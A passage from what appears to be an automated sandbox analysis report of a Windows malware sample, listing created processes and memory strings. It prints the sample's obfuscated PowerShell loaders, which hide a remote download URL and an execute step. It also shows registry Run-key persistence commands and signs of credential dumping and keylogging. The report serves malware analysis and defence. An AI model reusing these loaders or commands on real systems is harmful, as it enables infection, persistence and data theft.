Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. 
FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeIJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\eeubmxzcykpvacklrogamlalknwo"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zbfe"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. 
Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');JetJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$gdnings = 1;$tripetalous='s';$tripetalous+='ubstrin';$tripetalous+='g';function teucrium($gdskes){$expirable=$gdskes.length-$gdnings;for($heltemodiges=4; $heltemodiges -lt $expirable; $heltemodiges+=(5)){$mirakeldoktorerne+=$gdskes.$tripetalous.invoke($heltemodiges, $gdnings);}$mirakeldoktorerne;}function regulerbare($reticularia){& ($bestandigst) ($reticularia);}$planlggelserne235=teucrium 'leopmc,mpo croz freiprpol.hrilm rgabri /pree5 c r. hex0pl n embr( ha,w po ihemon.lgndpreeo eksw,olissttt ,ppnupt t yie red1ud.i0 mul.fodb0 ska; skr assuwbyttiovernse.s6.oti4el.x; tre depexwhis6u mo4 de,;vsk, alir,entv stt:.aus1,esu2 pic1fagb.cryp0 m t)w.tc d.lggopree npctrickstigoskgg/,jle2 kry0 me 1s lt0stoc0cruo1frkk0sahu1skru kontfskanipertrupcre kiaf valondrixlavr/konv1floc2scou1appl.,ont0stru ';$improvers=teucrium 'arbeudoubstaleepianrtarv-,rogatwitgsclae p.lnte stklas ';$ovariectomize=teucrium 'a rthsemit mastsuffpdykksnonp: saa/nedj/ortoegensu lymrjyd.opimepbegirngomof,rst jere,agncanstt fidisocievir,. t sr.fproch.r/glasmtri,e ciktarb,hmargisemin aasknice1phle. taktnonrhkdlsnover ';$astor=teucrium 'nonf> nd ';$bestandigst=teucrium ' pleil.doesp,lxskit ';$executry203='smittefaren';regulerbare (teucrium 'pugistecoepelstdeta-ventcfl.lodelininddtprepetilbnfreet taa lill-ex.epbehea.psot ab hperi raket k,o:gemm\adjuntartvbossn oce matltemps,obbeeu,o. 
fortepipxesthtbifr whis-garbv refator lundeuboreehyl pier$blyse remxre.pebigacdionubnsktnonsr a,kydoci2nedv0term3r,ma; men ');regulerbare (teucrium 'untri ov.fhaem sal,(tudbt brue kunsapp tzebr- alpno sa .irt o qh bi nonetgerm:ecot\re pndor v ston mone aceltoilsagroeafsk.tre.tfro x depthjlp)euph{quiceafsyxkvadite.rtsqui}m,le;mi.l ');$teariness = teucrium 'freredynecscrahimp.o gid brul%.ddea,uffp hi pfilhdmadnani,at ma,askum%ha g\beavpov rr nolediscs mani iklgdiagnpappa t,slved 2shir3bu g.syndh,alla konl uni fl,&pose&eate byliebillcafhohpanto kns ve s$tota ';regulerbare (teucrium 'p.lu$c.shgma,tlabonoenthbaspeausorlk ap:fores timu av,ban ri alinram,soprre frerconjtspariun cocronnkass= tek(sprnc kremdertdm.lj felt/ haycmerc over$romet ,rleleveascrur pa.i misnkalde orrsraglsbewh)wamu ');regulerbare (teucrium 'sku,$havigacrold.inovipeblmlea banlm rk: eartdiobaweevaudbyl ly maffao f,rdb,rti c,ag spkh udse.ndbdamin= con$ tevocarov.atra odorpolyirepreoverctordtsor.ostorm accibe,nzsamdebybu.mil,srek.pr onldhoti usttlivs(afsk$ .oba regsbrantdiviogeinrd.mo)a.me ');$ovariectomize=$taalmodighed[0];regulerbare (teucrium ' bra$ lobg mallt.lfot rbbafh.asenels,co:pos d iderberbimetof a itlinesgimbp prorglewoeumeb kval skaedispm u seskrur pensnois=.kvand ugepaliw vul- haro egabarmojflerealdrc f.rtcy e man suna yn nssbkkettabeef,rgmhakk.dis.n exte britbar,.briewethiefan,beftecsaltlmanni.lidebrnenbaa,t tem ');regulerbare (teucrium 'foli$ rusdpleoramtsiklokfoverta sesrolap te.rcil.oudlubcretlg,beei
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$gdnings = 1;$tripetalous='s';$tripetalous+='ubstrin';$tripetalous+='g';function teucrium($gdskes){$expirable=$gdskes.length-$gdnings;for($heltemodiges=4; $heltemodiges -lt $expirable; $heltemodiges+=(5)){$mirakeldoktorerne+=$gdskes.$tripetalous.invoke($heltemodiges, $gdnings);}$mirakeldoktorerne;}function regulerbare($reticularia){& ($bestandigst) ($reticularia);}$planlggelserne235=teucrium 'leopmc,mpo croz freiprpol.hrilm rgabri /pree5 c r. hex0pl n embr( ha,w po ihemon.lgndpreeo eksw,olissttt ,ppnupt t yie red1ud.i0 mul.fodb0 ska; skr assuwbyttiovernse.s6.oti4el.x; tre depexwhis6u mo4 de,;vsk, alir,entv stt:.aus1,esu2 pic1fagb.cryp0 m t)w.tc d.lggopree npctrickstigoskgg/,jle2 kry0 me 1s lt0stoc0cruo1frkk0sahu1skru kontfskanipertrupcre kiaf valondrixlavr/konv1floc2scou1appl.,ont0stru ';$improvers=teucrium 'arbeudoubstaleepianrtarv-,rogatwitgsclae p.lnte stklas ';$ovariectomize=teucrium 'a rthsemit mastsuffpdykksnonp: saa/nedj/ortoegensu lymrjyd.opimepbegirngomof,rst jere,agncanstt fidisocievir,. t sr.fproch.r/glasmtri,e ciktarb,hmargisemin aasknice1phle. taktnonrhkdlsnover ';$astor=teucrium 'nonf> nd ';$bestandigst=teucrium ' pleil.doesp,lxskit ';$executry203='smittefaren';regulerbare (teucrium 'pugistecoepelstdeta-ventcfl.lodelininddtprepetilbnfreet taa lill-ex.epbehea.psot ab hperi raket k,o:gemm\adjuntartvbossn oce matltemps,obbeeu,o. 
fortepipxesthtbifr whis-garbv refator lundeuboreehyl pier$blyse remxre.pebigacdionubnsktnonsr a,kydoci2nedv0term3r,ma; men ');regulerbare (teucrium 'untri ov.fhaem sal,(tudbt brue kunsapp tzebr- alpno sa .irt o qh bi nonetgerm:ecot\re pndor v ston mone aceltoilsagroeafsk.tre.tfro x depthjlp)euph{quiceafsyxkvadite.rtsqui}m,le;mi.l ');$teariness = teucrium 'freredynecscrahimp.o gid brul%.ddea,uffp hi pfilhdmadnani,at ma,askum%ha g\beavpov rr nolediscs mani iklgdiagnpappa t,slved 2shir3bu g.syndh,alla konl uni fl,&pose&eate byliebillcafhohpanto kns ve s$tota ';regulerbare (teucrium 'p.lu$c.shgma,tlabonoenthbaspeausorlk ap:fores timu av,ban ri alinram,soprre frerconjtspariun cocronnkass= tek(sprnc kremdertdm.lj felt/ haycmerc over$romet ,rleleveascrur pa.i misnkalde orrsraglsbewh)wamu ');regulerbare (teucrium 'sku,$havigacrold.inovipeblmlea banlm rk: eartdiobaweevaudbyl ly maffao f,rdb,rti c,ag spkh udse.ndbdamin= con$ tevocarov.atra odorpolyirepreoverctordtsor.ostorm accibe,nzsamdebybu.mil,srek.pr onldhoti usttlivs(afsk$ .oba regsbrantdiviogeinrd.mo)a.me ');$ovariectomize=$taalmodighed[0];regulerbare (teucrium ' bra$ lobg mallt.lfot rbbafh.asenels,co:pos d iderberbimetof a itlinesgimbp prorglewoeumeb kval skaedispm u seskrur pensnois=.kvand ugepaliw vul- haro egabarmojflerealdrc f.rtcy e man suna yn nssbkkettabeef,rgmhakk.dis.n exte britbar,.briewethiefan,beftecsaltlmanni.lidebrnenbaa,t tem ');regulerbare (teucrium 'foli$ rusdpleoramtsiklokfoverta sesrolap te.rcil.oudlubcretlg,beei
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "vibeka" /t reg_expand_sz /d "%pneumatorrhachis% -w 1 $salpeterholdiges=(get-itemproperty -path 'hkcu:\quicker\').savvy;%pneumatorrhachis% ($salpeterholdiges)"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$raakolde = 1;$fornrmet='s';$fornrmet+='ubstrin';$fornrmet+='g';function circumflexes($cumulet){$semimonarchically=$cumulet.length-$raakolde;for($habitually=4; $habitually -lt $semimonarchically; $habitually+=(5)){$wenzel+=$cumulet.$fornrmet.invoke($habitually, $raakolde);}$wenzel;}function jettes($trendy){&($indbagendes) ($trendy);}$simultansceners=circumflexes 'ark,mmervoan.czvampit lel elelblreasy.o/jagt5 ve.seac0t,sp ryg.( krmw.urdiriitn s rdpi do.orhwalloshjem g,on prat.oli ,eg1inte0remb.spra0anal;duct ret.wvagtiatomnskyt6aced4 non;falc f.glx.art6pseu4.icr;rovf milrgramvnert:nara1h,lg2rive1unde.sopr0pres)vrd. p.slg,ndeecubacskinktillooffp/slib2pl r0ned,1appe0onyc0ven,1 enn0trfi1 bre v defmickikonsr traea.trf dr oqrscxsamm/moor1hard2 ,or1werf.,yde0.uto ';$optrins45=circumflexes 'tidsui.prsp,yceskabrover-stemaukeng,ondelivine,tethera ';$levemulighed=circumflexes 'b,slhg,ldt mentinflpko,m:conf/ke,d/,ndf8ago.7 bal.pige1cann2.ejl1 fer.,rol1diet0nona5 ske..ata1 bl,6ex.e3kast/srmrd kile ne.tskreeindmn rot myxibe aokonknconse boyndesi.s,rtj.attadissv toda non ';$cose=circumflexes 'skor>undi ';$indbagendes=circumflexes 'dm,nimilieselsx bar ';$nutritionary133='paakldtes';jettes (circumflexes 'ch dssonaeautotalda-unmyc.rocovalgn,annt ende.enin s.dto er can- nobp ixta fo.tbindhme.k vrditsorg:baga\pt.rfbureopot,routshtot,j s.iuretrlillesfletbtikmr gabesmaamradesamoret ivs.lbn.margtaircx iltsaut pote-la dvkinea boll safuencaediap ,npr$causn illudiglt tndr,nbrikon,tbra,iun.kodegenspydatricr egnykrim1k.ip3erem3l.eb; bri ');jettes (circumflexes 'tr.ni.inkfhoo. 
skil(indit aroeundesuafmtepit-drukpfareaskibtduplhafid siltruck:none\sla,f sgeo bu,rtec.hobsejap.puquanlbloks ostbs,mmrp osepal.msociscudbe pics a,m.te rtbre,xdigit ,fl),era{giske andxre ainacrtcham}pg.e;ergo ');$ballplayers248 = circumflexes ' nkespikc udmhsiego lgu eksp%s,paabageptaktpotopdelemaimpetarchatran%she,\paraatrignkolltho,eiangulskrmltr.ke anpa jounchr,1umed4 c.s4sur...lumgvilkrbel.oje n ef e&sa,m&d.ge upfiebil cunnah kreon,np ci.i$ kri ';jettes (circumflexes 'real$,eclgfalsl.nifoaxi,bwolfaafselcoin:sgesfscrso vrmrbrbaabronn kkek tabr,obbigre nresig kr,s oltpoverucafenoverksol t kurebagnt bits .ps=abd.(dab,csju.mel md ,in ferr/calcc ch, f rs$bedrbpi radra,lsna lurfjpmarkldialairr.yindve r,trseiss puz2duct4ba.h8phot)dri ');jettes (circumflexes 'ha.l$slvsgeftel nfost,ibm.inatabpltick: spea moklectovsubte uneoregilsndaierodtdispemdrestol =lnn,$myndlraskeskilv w.veforbmstrauf rflgauki.azigyemehpreee traddole.regeseft.p ci.lindaivar.tva,e(sume$enhecformo.dves pree g.n)spil ');$levemulighed=$alveolites[0];jettes (circumflexes 'anbr$.addgu.trl ,taoim ebta.ba.alclb,nk:bests.orkk gibem,aspjotats yti ,unccoa,=partndagbe kecwurok-,lafowainb ejljskrseuns.curo.t.onc b anssvalyvands igmtm.scejug msoap.fascnphylefre,t iga..oncwhetee cikb istcderalkin isporemetanmapptf er ');jet
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$raakolde = 1;$fornrmet='s';$fornrmet+='ubstrin';$fornrmet+='g';function circumflexes($cumulet){$semimonarchically=$cumulet.length-$raakolde;for($habitually=4; $habitually -lt $semimonarchically; $habitually+=(5)){$wenzel+=$cumulet.$fornrmet.invoke($habitually, $raakolde);}$wenzel;}function jettes($trendy){&($indbagendes) ($trendy);}$simultansceners=circumflexes 'ark,mmervoan.czvampit lel elelblreasy.o/jagt5 ve.seac0t,sp ryg.( krmw.urdiriitn s rdpi do.orhwalloshjem g,on prat.oli ,eg1inte0remb.spra0anal;duct ret.wvagtiatomnskyt6aced4 non;falc f.glx.art6pseu4.icr;rovf milrgramvnert:nara1h,lg2rive1unde.sopr0pres)vrd. p.slg,ndeecubacskinktillooffp/slib2pl r0ned,1appe0onyc0ven,1 enn0trfi1 bre v defmickikonsr traea.trf dr oqrscxsamm/moor1hard2 ,or1werf.,yde0.uto ';$optrins45=circumflexes 'tidsui.prsp,yceskabrover-stemaukeng,ondelivine,tethera ';$levemulighed=circumflexes 'b,slhg,ldt mentinflpko,m:conf/ke,d/,ndf8ago.7 bal.pige1cann2.ejl1 fer.,rol1diet0nona5 ske..ata1 bl,6ex.e3kast/srmrd kile ne.tskreeindmn rot myxibe aokonknconse boyndesi.s,rtj.attadissv toda non ';$cose=circumflexes 'skor>undi ';$indbagendes=circumflexes 'dm,nimilieselsx bar ';$nutritionary133='paakldtes';jettes (circumflexes 'ch dssonaeautotalda-unmyc.rocovalgn,annt ende.enin s.dto er can- nobp ixta fo.tbindhme.k vrditsorg:baga\pt.rfbureopot,routshtot,j s.iuretrlillesfletbtikmr gabesmaamradesamoret ivs.lbn.margtaircx iltsaut pote-la dvkinea boll safuencaediap ,npr$causn illudiglt tndr,nbrikon,tbra,iun.kodegenspydatricr egnykrim1k.ip3erem3l.eb; bri ');jettes (circumflexes 'tr.ni.inkfhoo. 
skil(indit aroeundesuafmtepit-drukpfareaskibtduplhafid siltruck:none\sla,f sgeo bu,rtec.hobsejap.puquanlbloks ostbs,mmrp osepal.msociscudbe pics a,m.te rtbre,xdigit ,fl),era{giske andxre ainacrtcham}pg.e;ergo ');$ballplayers248 = circumflexes ' nkespikc udmhsiego lgu eksp%s,paabageptaktpotopdelemaimpetarchatran%she,\paraatrignkolltho,eiangulskrmltr.ke anpa jounchr,1umed4 c.s4sur...lumgvilkrbel.oje n ef e&sa,m&d.ge upfiebil cunnah kreon,np ci.i$ kri ';jettes (circumflexes 'real$,eclgfalsl.nifoaxi,bwolfaafselcoin:sgesfscrso vrmrbrbaabronn kkek tabr,obbigre nresig kr,s oltpoverucafenoverksol t kurebagnt bits .ps=abd.(dab,csju.mel md ,in ferr/calcc ch, f rs$bedrbpi radra,lsna lurfjpmarkldialairr.yindve r,trseiss puz2duct4ba.h8phot)dri ');jettes (circumflexes 'ha.l$slvsgeftel nfost,ibm.inatabpltick: spea moklectovsubte uneoregilsndaierodtdispemdrestol =lnn,$myndlraskeskilv w.veforbmstrauf rflgauki.azigyemehpreee traddole.regeseft.p ci.lindaivar.tva,e(sume$enhecformo.dves pree g.n)spil ');$levemulighed=$alveolites[0];jettes (circumflexes 'anbr$.addgu.trl ,taoim ebta.ba.alclb,nk:bests.orkk gibem,aspjotats yti ,unccoa,=partndagbe kecwurok-,lafowainb ejljskrseuns.curo.t.onc b anssvalyvands igmtm.scejug msoap.fascnphylefre,t iga..oncwhetee cikb istcderalkin isporemetanmapptf er ');jet
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "vibeka" /t reg_expand_sz /d "%pneumatorrhachis% -w 1 $salpeterholdiges=(get-itemproperty -path 'hkcu:\quicker\').savvy;%pneumatorrhachis% ($salpeterholdiges)"
            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe"
            Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, qDlmBUIvkRrWNd.exe, 0000001F.00000002.3290382867.00000000013D1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
            Source: qDlmBUIvkRrWNd.exe, 0000001F.00000002.3290382867.00000000013D1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: wab.exe, 00000008.00000002.3295624818.00000000064A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [2024/04/30 02:26:47 Program Manager]
            Source: qDlmBUIvkRrWNd.exe, 0000001F.00000002.3290382867.00000000013D1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: wab.exe, 00000008.00000003.2537135847.00000000064A5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [2024/04/26 07:40:44 Program Manager]
            Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerONS
            Source: wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
            Source: qDlmBUIvkRrWNd.exe, 0000001F.00000002.3290382867.00000000013D1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: wab.exe, 00000008.00000003.2537070704.00000000064FB000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295900301.00000000064FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
            Source: wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [2024/04/26 09:11:46 Program Manager]
            Source: wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerles
            Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.00000000064AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
